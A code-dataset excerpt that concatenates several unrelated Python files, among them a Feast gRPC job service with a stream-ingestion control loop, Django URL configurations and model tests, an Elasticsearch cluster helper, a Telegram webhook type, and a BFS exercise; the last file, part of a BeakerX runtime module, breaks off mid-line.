ingestion_timespan=request.ingestion_timespan,\n cron_schedule=request.cron_schedule,\n )\n\n return ScheduleOfflineToOnlineIngestionJobResponse()\n\n def UnscheduleOfflineToOnlineIngestionJob(\n self, request: UnscheduleOfflineToOnlineIngestionJobRequest, context\n ):\n feature_table = self.client.feature_store.get_feature_table(\n request.table_name, request.project\n )\n unschedule_offline_to_online_ingestion(\n client=self.client, project=request.project, feature_table=feature_table,\n )\n return UnscheduleOfflineToOnlineIngestionJobResponse()\n\n def GetHistoricalFeatures(self, request: GetHistoricalFeaturesRequest, context):\n \"\"\"Produce a training dataset, return a job id that will provide a file reference\"\"\"\n\n if not self.is_whitelisted(request.project):\n raise ValueError(\n f\"Project {request.project} is not whitelisted. Please contact your Feast administrator to whitelist it.\"\n )\n\n job = start_historical_feature_retrieval_job(\n client=self.client,\n project=request.project,\n entity_source=DataSource.from_proto(request.entity_source),\n feature_tables=self.client._get_feature_tables_from_feature_refs(\n list(request.feature_refs), request.project\n ),\n output_format=request.output_format,\n output_path=request.output_location,\n )\n\n output_file_uri = job.get_output_file_uri(block=False)\n\n job_start_timestamp = Timestamp()\n job_start_timestamp.FromDatetime(job.get_start_time())\n\n return GetHistoricalFeaturesResponse(\n id=job.get_id(),\n output_file_uri=output_file_uri,\n job_start_time=job_start_timestamp,\n )\n\n def StartStreamToOnlineIngestionJob(\n self, request: StartStreamToOnlineIngestionJobRequest, context\n ):\n \"\"\"Start job to ingest data from stream into online store\"\"\"\n\n if not self.is_whitelisted(request.project):\n raise ValueError(\n f\"Project {request.project} is not whitelisted. 
Please contact your Feast administrator to whitelist it.\"\n )\n\n feature_table = self.client.feature_store.get_feature_table(\n request.table_name, request.project\n )\n\n if self.client.config.getboolean(opt.JOB_SERVICE_ENABLE_CONTROL_LOOP):\n # If the control loop is enabled, return existing stream ingestion job id instead of starting a new one\n params = get_stream_to_online_ingestion_params(\n self.client, request.project, feature_table, []\n )\n job_hash = params.get_job_hash()\n for job in list_jobs(include_terminated=True, client=self.client):\n if isinstance(job, StreamIngestionJob) and job.get_hash() == job_hash:\n job_start_timestamp = Timestamp()\n job_start_timestamp.FromDatetime(job.get_start_time())\n return StartStreamToOnlineIngestionJobResponse(\n id=job.get_id(),\n job_start_time=job_start_timestamp,\n table_name=job.get_feature_table(),\n log_uri=job.get_log_uri(), # type: ignore\n )\n raise RuntimeError(\n \"Feast Job Service has control loop enabled, \"\n \"but couldn't find the existing stream ingestion job for the given FeatureTable\"\n )\n\n # TODO: add extra_jars to request\n job = start_stream_to_online_ingestion(\n client=self.client,\n project=request.project,\n feature_table=feature_table,\n extra_jars=[],\n )\n\n job_start_timestamp = Timestamp()\n job_start_timestamp.FromDatetime(job.get_start_time())\n return StartStreamToOnlineIngestionJobResponse(\n id=job.get_id(),\n job_start_time=job_start_timestamp,\n table_name=request.table_name,\n log_uri=job.get_log_uri(), # type: ignore\n )\n\n def ListJobs(self, request, context):\n \"\"\"List all types of jobs\"\"\"\n\n if not self.is_whitelisted(request.project):\n raise ValueError(\n f\"Project {request.project} is not whitelisted. Please contact your Feast administrator to whitelist it.\"\n )\n\n jobs = list_jobs(\n include_terminated=request.include_terminated,\n project=request.project,\n table_name=request.table_name,\n client=self.client,\n )\n return ListJobsResponse(jobs=[_job_to_proto(job) for job in jobs])\n\n def CancelJob(self, request, context):\n \"\"\"Stop a single job\"\"\"\n job = get_job_by_id(request.job_id, client=self.client)\n job.cancel()\n return CancelJobResponse()\n\n def GetJob(self, request, context):\n \"\"\"Get details of a single job\"\"\"\n job = get_job_by_id(request.job_id, client=self.client)\n return GetJobResponse(job=_job_to_proto(job))\n\n\ndef start_control_loop() -> None:\n \"\"\"Starts control loop that continuously ensures that correct jobs are being run.\n\n Currently this affects only the stream ingestion jobs. 
Please refer to\n ensure_stream_ingestion_jobs for full documentation on how the check works.\n\n \"\"\"\n logger.info(\n \"Feast Job Service is starting a control loop in a background thread, \"\n \"which will ensure that stream ingestion jobs are successfully running.\"\n )\n try:\n feature_store = FeastClient()\n client = Client(feature_store)\n while True:\n ensure_stream_ingestion_jobs(client, all_projects=True)\n time.sleep(1)\n except Exception:\n traceback.print_exc()\n finally:\n # Send interrupt signal to the main thread to kill the server if control loop fails\n os.kill(os.getpid(), signal.SIGINT)\n\n\nclass HealthServicerImpl(HealthServicer):\n def Check(self, request, context):\n return HealthCheckResponse(status=ServingStatus.SERVING)\n\n\nclass LoggingInterceptor(grpc.ServerInterceptor):\n def intercept_service(self, continuation, handler_call_details):\n logger.info(handler_call_details)\n return continuation(handler_call_details)\n\n\ndef start_job_service() -> None:\n \"\"\"\n Start Feast Job Service\n \"\"\"\n feast_client = FeastClient()\n client = Client(feast_client)\n\n if client.config.getboolean(opt.JOB_SERVICE_ENABLE_CONTROL_LOOP):\n # Start the control loop thread only if it's enabled from configs\n thread = threading.Thread(target=start_control_loop, daemon=True)\n thread.start()\n\n server = grpc.server(ThreadPoolExecutor(), interceptors=(LoggingInterceptor(),))\n JobService_pb2_grpc.add_JobServiceServicer_to_server(\n JobServiceServicer(client), server\n )\n LegacyJobService_pb2_grpc.add_JobServiceServicer_to_server(\n JobServiceServicer(client), server\n )\n add_HealthServicer_to_server(HealthServicerImpl(), server)\n server.add_insecure_port(\"[::]:6568\")\n server.start()\n logger.info(\"Feast Job Service is listening on port :6568\")\n server.wait_for_termination()\n\n\ndef _get_expected_job_hash_to_tables(\n client: Client, projects: List[str]\n) -> Dict[str, Tuple[str, FeatureTable]]:\n \"\"\"\n Checks all feature tables for the requires project(s) and determines all required stream\n ingestion jobs from them. 
Outputs a map of the expected job_hash to a tuple of (project, table_name).\n\n Args:\n all_projects (bool): If true, runs the check for all project.\n Otherwise only checks the current project.\n\n Returns:\n Dict[str, Tuple[str, str]]: Map of job_hash -> (project, table_name) for expected stream ingestion jobs\n \"\"\"\n job_hash_to_table_refs = {}\n\n for project in projects:\n feature_tables = client.feature_store.list_feature_tables(project)\n for feature_table in feature_tables:\n if feature_table.stream_source is not None:\n params = get_stream_to_online_ingestion_params(\n client, project, feature_table, []\n )\n job_hash = params.get_job_hash()\n job_hash_to_table_refs[job_hash] = (project, feature_table)\n\n return job_hash_to_table_refs\n\n\ndef ensure_stream_ingestion_jobs(client: Client, all_projects: bool):\n \"\"\"Ensures all required stream ingestion jobs are running and cleans up the unnecessary jobs.\n\n More concretely, it will determine\n - which stream ingestion jobs are running\n - which stream ingestion jobs should be running\n And it'll do 2 kinds of operations\n - Cancel all running jobs that should not be running\n - Start all non-existent jobs that should be running\n\n Args:\n all_projects (bool): If true, runs the check for all project.\n Otherwise only checks the client's current project.\n \"\"\"\n\n projects = (\n client.feature_store.list_projects()\n if all_projects\n else [client.feature_store.project]\n )\n if client.config.exists(opt.WHITELISTED_PROJECTS):\n whitelisted_projects = client.config.get(opt.WHITELISTED_PROJECTS)\n if whitelisted_projects:\n whitelisted_projects = whitelisted_projects.split(\",\")\n projects = [\n project for project in projects if project in whitelisted_projects\n ]\n\n expected_job_hash_to_tables = _get_expected_job_hash_to_tables(client, projects)\n\n expected_job_hashes = set(expected_job_hash_to_tables.keys())\n\n jobs_by_hash: Dict[str, StreamIngestionJob] = {}\n # when we want to retry failed jobs, we shouldn't include terminated jobs here\n # thus, Control Loop will behave like no job exists and will spawn new one\n for job in client.list_jobs(\n include_terminated=not client.config.getboolean(\n opt.JOB_SERVICE_RETRY_FAILED_JOBS\n )\n ):\n if (\n isinstance(job, StreamIngestionJob)\n and job.get_status() != SparkJobStatus.COMPLETED\n ):\n jobs_by_hash[job.get_hash()] = job\n\n existing_job_hashes = set(jobs_by_hash.keys())\n\n job_hashes_to_cancel = existing_job_hashes - expected_job_hashes\n job_hashes_to_start = expected_job_hashes - existing_job_hashes\n\n logger.debug(\n f\"existing_job_hashes = {sorted(list(existing_job_hashes))} \"\n f\"expected_job_hashes = {sorted(list(expected_job_hashes))}\"\n )\n\n for job_hash in job_hashes_to_start:\n # Any job that we wish to start should be among expected table refs map\n project, feature_table = expected_job_hash_to_tables[job_hash]\n logger.warning(\n f\"Starting a stream ingestion job for project={project}, \"\n f\"table_name={feature_table.name} with job_hash={job_hash}\"\n )\n client.start_stream_to_online_ingestion(feature_table, [], project=project)\n\n # prevent scheduler from peak load\n time.sleep(client.config.getint(opt.JOB_SERVICE_PAUSE_BETWEEN_JOBS))\n\n for job_hash in job_hashes_to_cancel:\n job = jobs_by_hash[job_hash]\n if job.get_status() != SparkJobStatus.IN_PROGRESS:\n logger.warning(\n f\"Can't cancel job with job_hash={job_hash} job_id={job.get_id()} status={job.get_status()}\"\n )\n continue\n\n logger.warning(\n f\"Cancelling a stream ingestion 
job with job_hash={job_hash} job_id={job.get_id()} status={job.get_status()}\"\n )\n try:\n job.cancel()\n except FailedPrecondition as exc:\n logger.error(f\"Job canceling failed with exception {exc}\")\n","repo_name":"Azure/feast-azure","sub_path":"cluster/sdk/python/feast_spark/job_service.py","file_name":"job_service.py","file_ext":"py","file_size_in_byte":17578,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"2"} +{"seq_id":"18071140533","text":"\"\"\"paperview URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('admin/', admin.site.urls), # Don't touch this, pregenerated\n path('', views.index, name='index'),\n\n # Test paths, delete these eventually\n path('listnames/', views.listnames, name='listnames'),\n path('echopostdata/', views.echopostdata, name='echopostdata'),\n path('tothelimit/', views.tothelimit, name='tothelimit'),\n path('addname/', views.addname, name='addname'),\n path('search/test/', views.searchForName, name='search_test'),\n path('graphtest', views.graphTest, name='Graph test'),\n # End of test paths\n\n path('search/author', views.search_for_author, name = 'search_for_author'),\n path('search/article', views.search_for_article, name = 'search_for_article'),\n path('search/interest', views.search_for_interest, name = 'search_for_interest'),\n\tpath('author/', views.specific_author, name = 'specific_author'),\n path('article/', views.specific_article, name = 'specific_article'),\n path('new/author/', views.new_author, name = 'new_author'),\n path('new/article/', views.new_article, name = 'new_article'),\n]\n","repo_name":"michaelvdow/PaperView","sub_path":"back-end/server/paperview/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23663338487","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.views.generic import RedirectView\n\n\nurlpatterns = [\n path('favicon.ico',RedirectView.as_view(url='static/img/favicon.ico')),\n path('', include('index.urls')),\n path('article/', include('article.urls')),\n path('note/', include('note.urls')),\n path('book/', include('book.urls')),\n path('admin/', admin.site.urls),\n]\n","repo_name":"HanZhenYe/Blog","sub_path":"blog/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19782047780","text":"from lib.connection import Connection\nfrom lib.result import acknowledge_result\n\nclass Cluster(object):\n \"\"\"\n This class provides access to ElasticSearch cluster management features.\n \"\"\"\n\n def __init__(self, host_name, port_number):\n \"\"\"\n Instantiate object with the following parameters:\n host_name ElasticSearch 
host name\n port_number ElasticsSearch API port number\n \"\"\"\n self.es_connection = Connection(host_name, port_number)\n\n def cluster_health(self, index_name):\n \"\"\"\n Display basic cluster health information, or if index is specified, of that index.\n index_name Index to get health status on\n \"\"\"\n es = self.es_connection.get_connection()\n if index_name == \"_all\":\n result = es.cluster.health()\n else:\n result = es.cluster.health(index=index_name)\n\n # Print an error if one occurred\n acknowledge_result(result)","repo_name":"arktos65/elasticsearch-tools","sub_path":"lib/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"9692382328","text":"from .base import TelegramStructure, Field, ListField\n\n\nclass WebhookInfo(TelegramStructure):\n\n url = Field()\n has_custom_certificate = Field()\n pending_update_count = Field()\n last_error_date = Field()\n last_error_message = Field()\n max_connections = Field()\n allowed_update = Field()\n\n def __init__(self,\n url: str,\n has_custom_certificate: bool,\n pending_update_count: int,\n last_error_date: int = None,\n last_error_message: str = None,\n max_connections: int = None,\n allowed_update: list = None\n ):\n self.url = \\\n Field(url, [str])\n\n self.has_custom_certificate = \\\n Field(has_custom_certificate, [bool])\n\n self.pending_update_count = \\\n Field(pending_update_count, [int])\n\n self.last_error_date = \\\n Field(last_error_date, [int])\n\n self.last_error_message = \\\n Field(last_error_message, [str])\n\n self.max_connections = \\\n Field(max_connections, [int])\n\n self.allowed_update = \\\n ListField(allowed_update, [str])\n","repo_name":"cmd410/OrigamiBot","sub_path":"origamibot/core/teletypes/webhook_info.py","file_name":"webhook_info.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"2"} +{"seq_id":"20756255493","text":"\"\"\"\nC-14.51 Provide an implementation of the BFS algorithm that uses a FIFO queue,\nrather than a level-by-level formulation, to manage vertices that have been\ndiscovered until the time when their neighbors are considered.\n\"\"\"\n\nfrom collections import deque\n\ndef bfs(g, u, discovered):\n \"\"\"\n bfs using fifo queue\n \"\"\"\n q = deque()\n q.append(u)\n\n while len(q) > 0:\n print(q)\n v = q.popleft()\n for e in g.incident_edges(v):\n new_v = e.opposite(v)\n if new_v not in discovered:\n discovered[new_v] = e\n q.append(new_v)\n\nif __name__ == \"__main__\":\n from shared_14_chapter import Graph\n\n g = Graph()\n v1 = g.insert_vertex(element='v1')\n v2 = g.insert_vertex(element='v2')\n v3 = g.insert_vertex(element='v3')\n v4 = g.insert_vertex(element='v4')\n v5 = g.insert_vertex(element='v5')\n e1 = g.insert_edge(v1, v2, element='e1')\n e2 = g.insert_edge(v1, v3, element='e2')\n e3 = g.insert_edge(v2, v3, element='e3')\n e4 = g.insert_edge(v3, v4, element='e4')\n e5 = g.insert_edge(v3, v5, element='e5')\n\n discovered = {v1: None}\n bfs(g, v1, discovered)\n assert len(discovered) == 5\n","repo_name":"aleksandarbos/solutions-for-data-structures-and-algorithms-in-python","sub_path":"c-14.51.py","file_name":"c-14.51.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"41454600453","text":"from rest_framework.views import APIView\n# from app.lib.response import 
ApiResponse\n# from app.users.views import UserProfile\n# from Winalytics.apps.approach.models import Approach\nfrom rest_framework.authtoken.models import Token\nfrom django.views.generic.edit import UpdateView\n# import itertools\n# import operator\n\n\nclass AccessUserObj:\n\n\tdef fromToken(self,request):\n\t\ttoken = request.META['HTTP_AUTHORIZATION'].replace(\"Token\",\"\")\t\n\t\treturn Token.objects.get(key=str(token).strip())\n\n# class PostCommonMethods:\n\n# \tdef getCreatedByName(obj):\n# \t\ttry:\n\t\t\t\n# \t\t\tuserProfile = UserProfile.objects.get(user_id = obj.created_by)\n\t\t\t\n# \t\t\treturn userProfile.fname\n# \t\texcept Exception as err:\n# \t\t\tprint(err)\n# \t\t\treturn None\t\n\n# class PhaseLib:\n\n# \tdef CheckPhaseExist(self, request, args):\n# \t\ttry:\n# \t\t\tphase = Phase.objects.filter(**args).get(id=request.data.get('phase'))\n# \t\t\tprint(phase.id)\n# \t\t\tif int(phase.id) is None:\n# \t\t\t\treturn True\n# \t\t\treturn False\n# \t\texcept Exception as err:\n# \t\t\tprint(err)\n# \t\t\treturn True\t\n\nclass RequestOverwrite(UpdateView):\n\n\tdef overWriteUserId(self, request, dic):\n\t\ttry:\n\t\t\tif request.POST._mutable is False:\n\t\t\t\trequest.POST._mutable = True\n\t\t\t\n\t\t\tfor key,value in dic.items():\n\t\t\t\trequest.POST[key] = value\n\t\texcept Exception as err:\n\t\t\tprint(err)\n\t\t\treturn False\n\n\tdef overWrite(self, request, dic):\n\t\ttry:\n\t\t\ttry:\n\t\t\t\tif request.data._mutable is False:\n\t\t\t\t\trequest.data._mutable = True\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\tfor key,value in dic.items():\n\t\t\t\trequest.data[key] = value\n\t\texcept Exception as err:\n\t\t\tprint(err)\n\t\t\treturn False\n\n# class CheckExistance():\n# \tdef isExists(self,Object,filter):\n# \t\tobj = Object.objects.filter(**filter)\n\n# \t\tif obj.exists():\n# \t\t\treturn True\n# \t\treturn False\t\t\t\n\n\n# class Common():\n# \tdef most_common(self, L):\n# \t # get an iterable of (item, iterable) pairs\n# \t SL = sorted((x, i) for i, x in enumerate(L))\n# \t # print 'SL:', SL\n# \t groups = itertools.groupby(SL, key=operator.itemgetter(0))\n# \t # auxiliary function to get \"quality\" for an item\n# \t def _auxfun(g):\n# \t item, iterable = g\n# \t count = 0\n# \t min_index = len(L)\n# \t for _, where in iterable:\n# \t count += 1\n# \t min_index = min(min_index, where)\n# \t # print 'item %r, count %r, minind %r' % (item, count, min_index)\n# \t return count, -min_index\n# \t # pick the highest-count/earliest item\n# \t return max(groups, key=_auxfun)[0]\n","repo_name":"hemant2113/instaspiel","sub_path":"app/lib/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17242870702","text":"from django.test import TestCase\nfrom django.core.exceptions import ValidationError\nfrom enbalde.models import Envio, TipoArticulo, Oferta, Usuario, Carrito, Articulo, Seleccion, Venta\nfrom django.utils import timezone\nfrom ddt import ddt, data\n\n\n# Create your tests here.\n\n# TODO: Envio.monto podria tener default en 0\n# TODO: Articulo.precio no puede ser menor que Articulo.costo\n\nUSUARIO = \"jperez\"\nCLAVE = \"123456\"\nNOMBRE = \"Juan\"\nAPELLIDO = \"Perez\"\nDIRECCION = \"Calle Siempreviva 123\"\nTELEFONO = \"1234-5678\"\nOBSERVACIONES = \"Buen cliente\"\nFECHA_FUTURA = timezone.datetime(2099, 5, 30, tzinfo=timezone.get_current_timezone())\nFECHA_PASADA = timezone.datetime(2020, 5, 30, 
tzinfo=timezone.get_current_timezone())\nARTICULO = \"Helado de chocolate\"\nDESCRIPCION = \"Un helado muy rico de chocolate con chips\"\nPRECIO = 1100\nCOSTO = 400\nIMAGEN = \"/assets/chocolate.png\"\nCANTIDAD = 13\nTIPO_ARTICULO = \"Balde\"\nOFERTA = \"10% Off\"\nENVIO = \"Retiro en tienda\"\nENVIO_MINUSCULA = ENVIO.lower()\n\n\ndef crear_usuario_completo():\n return Usuario.objects.create(username=USUARIO, password=CLAVE, first_name=NOMBRE,\n last_name=APELLIDO, direccion=DIRECCION, telefono=TELEFONO,\n observaciones=OBSERVACIONES, tipo=Usuario.TipoUsuario.CLIENTE)\n\n\ndef crear_tipo_de_articulo():\n return TipoArticulo.objects.create(nombre=TIPO_ARTICULO)\n\n\ndef crear_articulo(nombre=ARTICULO, descripcion=DESCRIPCION, precio=PRECIO, costo=COSTO, imagen=IMAGEN, cantidad=CANTIDAD):\n tipo_de_articulo = crear_tipo_de_articulo()\n return Articulo.objects.create(nombre=nombre, descripcion=descripcion, precio=precio, costo=costo, imagen=imagen,\n cantidad=cantidad, tipo=tipo_de_articulo)\n\n\ndef crear_envio(nombre=ENVIO, monto=0):\n return Envio.objects.create(nombre=nombre, monto=monto)\n\n\ndef crear_carrito(fecha=FECHA_FUTURA):\n cliente = crear_usuario_completo()\n return Carrito.objects.create(cliente=cliente, fecha=fecha)\n\n\ndef crear_oferta(nombre=OFERTA, descuento=10, fecha_vencimiento=FECHA_FUTURA):\n return Oferta.objects.create(nombre=nombre, descuento=descuento, fecha_vencimiento=fecha_vencimiento)\n\n\ndef crear_venta(numero=1, comprobante=2, fecha=FECHA_PASADA, total=1500):\n envio = crear_envio()\n carrito = crear_carrito()\n return Venta.objects.create(numero=numero, comprobante=comprobante, fecha=fecha, total=total, envio=envio, carrito=carrito)\n\n\nclass EnvioTestCase(TestCase):\n def test_envio_se_inicializa_correctamente(self):\n sut = crear_envio()\n self.assertEqual(ENVIO, sut.nombre)\n self.assertEqual(0, sut.monto)\n\n def test_nombre_es_el_string_por_defecto_de_envio(self):\n sut = crear_envio()\n self.assertEqual(ENVIO, sut.__str__())\n self.assertEqual(ENVIO, sut.__unicode__())\n\n def test_monto_no_puede_ser_negativo(self):\n sut = crear_envio(monto=-1)\n with self.assertRaisesMessage(ValidationError, \"Ensure this value is greater than or equal to 0.\"):\n sut.full_clean()\n\n\nclass TipoArticuloTestCase(TestCase):\n def test_tipo_articulo_se_inicializa_correctamente(self):\n sut = crear_tipo_de_articulo()\n self.assertEqual(TIPO_ARTICULO, sut.nombre)\n\n def test_nombre_es_el_string_por_defecto_de_envio(self):\n sut = crear_tipo_de_articulo()\n self.assertEqual(TIPO_ARTICULO, sut.__str__())\n self.assertEqual(TIPO_ARTICULO, sut.__unicode__())\n\n\n@ddt\nclass OfertaTestCase(TestCase):\n def test_oferta_se_inicializa_correctamente(self):\n sut = crear_oferta()\n self.assertEqual(OFERTA, sut.nombre)\n self.assertEqual(10, sut.descuento)\n self.assertEqual(FECHA_FUTURA, sut.fecha_vencimiento)\n\n @data(0, -1)\n def test_descuento_no_puede_ser_invalido(self, descuento_invalido: int):\n sut = crear_oferta(descuento=descuento_invalido)\n with self.assertRaisesMessage(ValidationError, \"Ensure this value is greater than or equal to 0.01.\"):\n sut.full_clean()\n\n def test_fecha_de_vencimiento_no_puede_ser_pasada(self):\n sut = crear_oferta(fecha_vencimiento=FECHA_PASADA)\n with self.assertRaisesMessage(ValidationError, \"La fecha no puede ser pasada.\"):\n sut.full_clean()\n\n def test_nombre_es_el_string_por_defecto_de_oferta(self):\n sut = crear_oferta()\n self.assertEqual(OFERTA, sut.__str__())\n self.assertEqual(OFERTA, sut.__unicode__())\n\n\nclass 
UsuarioTestCase(TestCase):\n def test_usuario_se_inicializa_correctamente(self):\n sut = crear_usuario_completo()\n self.assertEqual(USUARIO, sut.username)\n self.assertEqual(CLAVE, sut.password)\n self.assertEqual(NOMBRE, sut.first_name)\n self.assertEqual(APELLIDO, sut.last_name)\n self.assertEqual(DIRECCION, sut.direccion)\n self.assertEqual(TELEFONO, sut.telefono)\n self.assertEqual(OBSERVACIONES, sut.observaciones)\n self.assertEqual(Usuario.TipoUsuario.CLIENTE, sut.tipo)\n\n def test_nombre_es_el_string_por_defecto_de_usuario(self):\n sut = Usuario.objects.create(first_name=NOMBRE, last_name=APELLIDO)\n self.assertEqual(NOMBRE, sut.__str__())\n self.assertEqual(NOMBRE, sut.__unicode__())\n\n\nclass CarritoTestCase(TestCase):\n def test_carrito_se_inicializa_correctamente(self):\n sut = crear_carrito()\n self.assertEqual(USUARIO, sut.cliente.username)\n self.assertEqual(FECHA_FUTURA, sut.fecha)\n\n def test_fecha_no_puede_ser_pasada(self):\n sut = crear_carrito(fecha=FECHA_PASADA)\n with self.assertRaisesMessage(ValidationError, \"La fecha no puede ser pasada.\"):\n sut.full_clean()\n\n def test_nombre_del_cliente_del_carrito_es_el_string_por_defecto_de_carrito(self):\n nombre_del_carrito = f\"Carrito de {NOMBRE}\"\n sut = crear_carrito()\n self.assertEqual(nombre_del_carrito, sut.__str__())\n self.assertEqual(nombre_del_carrito, sut.__unicode__())\n\n\n@ddt\nclass ArticuloTestCase(TestCase):\n def test_articulo_se_inicializa_correctamente(self):\n sut = crear_articulo()\n self.assertEqual(ARTICULO, sut.nombre)\n self.assertEqual(DESCRIPCION, sut.descripcion)\n self.assertEqual(PRECIO, sut.precio)\n self.assertEqual(COSTO, sut.costo)\n self.assertEqual(IMAGEN, sut.imagen)\n self.assertEqual(CANTIDAD, sut.cantidad)\n self.assertEqual(TIPO_ARTICULO, sut.tipo.nombre)\n\n def test_cantidad_no_puede_ser_negativa(self):\n sut = crear_articulo(cantidad=-1)\n with self.assertRaisesMessage(ValidationError, \"Ensure this value is greater than or equal to 0.\"):\n sut.full_clean()\n\n @data(0, -1)\n def test_precio_no_puede_ser_invalida(self, precio_invalido):\n sut = crear_articulo(precio=precio_invalido)\n with self.assertRaisesMessage(ValidationError, \"Ensure this value is greater than or equal to 0.01.\"):\n sut.full_clean()\n\n def test_costo_no_puede_ser_negativo(self):\n sut = crear_articulo(costo=-1)\n with self.assertRaisesMessage(ValidationError, \"Ensure this value is greater than or equal to 0.\"):\n sut.full_clean()\n\n def test_nombre_del_articulo_es_el_string_por_defecto_de_articulo(self):\n sut = crear_articulo()\n self.assertEqual(ARTICULO, sut.__str__())\n self.assertEqual(ARTICULO, sut.__unicode__())\n\n\nclass SeleccionTestCase(TestCase):\n def test_seleccion_se_inicializa_correctamente(self):\n articulo = crear_articulo()\n carrito = crear_carrito()\n sut = Seleccion.objects.create(cantidad=2, carrito=carrito, articulo=articulo)\n self.assertEqual(ARTICULO, sut.articulo.nombre)\n self.assertEqual(NOMBRE, sut.carrito.cliente.first_name)\n self.assertEqual(2, sut.cantidad)\n\n def test_cantidad_no_puede_ser_cero(self):\n articulo = crear_articulo()\n carrito = crear_carrito()\n sut = Seleccion.objects.create(cantidad=0, carrito=carrito, articulo=articulo)\n with self.assertRaisesMessage(ValidationError, \"Ensure this value is greater than or equal to 1.\"):\n sut.full_clean()\n\n def test_nombre_de_la_seleccion_es_el_articulo_dentro_del_carrito(self):\n descripcion = f\"{ARTICULO} dentro de carrito 1 de {NOMBRE}\"\n articulo = crear_articulo()\n carrito = crear_carrito()\n 
sut = Seleccion.objects.create(cantidad=2, carrito=carrito, articulo=articulo)\n self.assertEqual(descripcion, sut.__str__())\n self.assertEqual(descripcion, sut.__unicode__())\n\n\n@ddt\nclass VentaTestCase(TestCase):\n def test_venta_se_inicializa_correctamente(self):\n sut = crear_venta()\n self.assertEqual(1, sut.numero)\n self.assertEqual(2, sut.comprobante)\n self.assertEqual(FECHA_PASADA, sut.fecha)\n self.assertEqual(1500, sut.total)\n self.assertEqual(ENVIO, sut.envio.nombre)\n self.assertEqual(NOMBRE, sut.carrito.cliente.first_name)\n\n def test_la_fecha_de_venta_no_puede_ser_futura(self):\n sut = crear_venta(fecha=FECHA_FUTURA)\n with self.assertRaisesMessage(ValidationError, \"La fecha no puede ser futura.\"):\n sut.full_clean()\n\n @data(0, -1)\n def test_el_total_no_puede_ser_invalido(self, total_invalido):\n sut = crear_venta(total=total_invalido)\n with self.assertRaisesMessage(ValidationError, \"Ensure this value is greater than or equal to 0.01.\"):\n sut.full_clean()\n\n def test_descripcion_de_venta_es_el_string_por_defecto(self):\n descripcion = f\"Venta a {NOMBRE} por 1500 con {ENVIO_MINUSCULA}\"\n sut = crear_venta()\n self.assertEqual(descripcion, sut.__str__())\n self.assertEqual(descripcion, sut.__unicode__())\n","repo_name":"NataliaAlvarezIspc/proyecto-ispc-ecommerce","sub_path":"back-end/django/enbalde/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":9752,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"30605835840","text":"import base64\nimport datetime\nimport json\nimport math\nimport os\nimport time\nimport urllib.error\nimport urllib.parse\nimport urllib.request\n\nimport IPython\nimport numpy\nimport pandas\nimport requests\nfrom IPython import get_ipython\nfrom beakerx_base import BaseObject, BeakerxHTML\n\ntry:\n from beakerx_tabledisplay import TableDisplay\nexcept ModuleNotFoundError:\n TableDisplay = None\ntry:\n from beakerx_tabledisplay.table_display_runtim import BeakerXTabledisplay\nexcept ModuleNotFoundError:\n BeakerXTabledisplay = None\n\nfrom beakerx.plots import chart\nfrom beakerx.forms import easyforms\nfrom ipykernel.comm import Comm\nfrom traitlets import Unicode\n\n\nclass OutputContainer:\n def __init__(self):\n self.items = []\n\n def clear(self):\n self.items = []\n\n def addItem(self, obj):\n self.items.append(obj)\n\n def getItems(self):\n return self.items\n\n\nclass BeakerCodeCell:\n def __init__(self, cellId, evaluatorId):\n self.cellId = cellId\n self.evaluatorId = evaluatorId\n self.code = ''\n self.outputtype = ''\n self.output = None\n self.tags = ''\n\n def getCellId(self):\n return self.cellId\n\n def getEvaluatorId(self):\n return self.evaluatorId\n\n def getCode(self):\n return self.code\n\n def getOutputType(self):\n return self.outputtype\n\n def getOutput(self):\n return self.output\n\n def getTags(self):\n return self.tags\n\n\ndef convertTypeName(typ):\n if typ.startswith(\"float\"):\n return \"double\"\n if typ.startswith(\"int\") or typ.startswith(\"uint\") or typ.startswith(\"short\") or typ.startswith(\n \"ushort\") or typ.startswith(\"long\") or typ.startswith(\"ulong\"):\n return \"integer\"\n if typ.startswith(\"bool\"):\n return \"boolean\"\n if typ.startswith(\"date\") or typ.startswith(\"Time\"):\n return \"datetime\"\n return \"string\"\n\n\ndef isPrimitiveType(typ):\n if typ.startswith(\"float\"):\n return True\n if typ.startswith(\"int\") or typ.startswith(\"uint\") or typ.startswith(\"short\") or typ.startswith(\n 
